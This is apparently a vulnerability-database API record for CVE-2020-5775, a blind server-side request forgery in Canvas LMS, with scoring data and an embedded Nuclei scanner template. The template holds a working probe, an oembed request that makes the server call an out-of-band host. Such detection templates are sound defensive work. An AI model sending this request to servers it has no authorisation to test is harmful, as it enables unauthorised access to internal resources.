{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-5775/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-5775/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-5775/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-5775/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-5775/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-5775"},"sightings":{"href":"/api/v1/sightings/cve-2020-5775"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.06531,"kev":false,"percentile":0.9349},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-5775.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2020-5775\n\ninfo:\n  name: Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery\n  author: alph4byt3\n  severity: medium\n  description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n  remediation: |\n    Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2020-49\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-5775\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N\n    cvss-score: 5.8\n    cve-id: CVE-2020-5775\n    cwe-id: CWE-918\n    epss-score: 0.06531\n    epss-percentile: 0.9349\n    cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: instructure\n    product: canvas_learning_management_service\n  tags: cve,cve2020,ssrf,oast,blind,tenable,instructure,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo\"\n\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 490a0046304402203378f88b04cd97067354946af3a1319b145ca916052081732ccd927fcb3c3e0e02202f1da401d3fe105d662e478baeb8bc71447723868f0876ad144d93a3a5571ee1:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-5775"}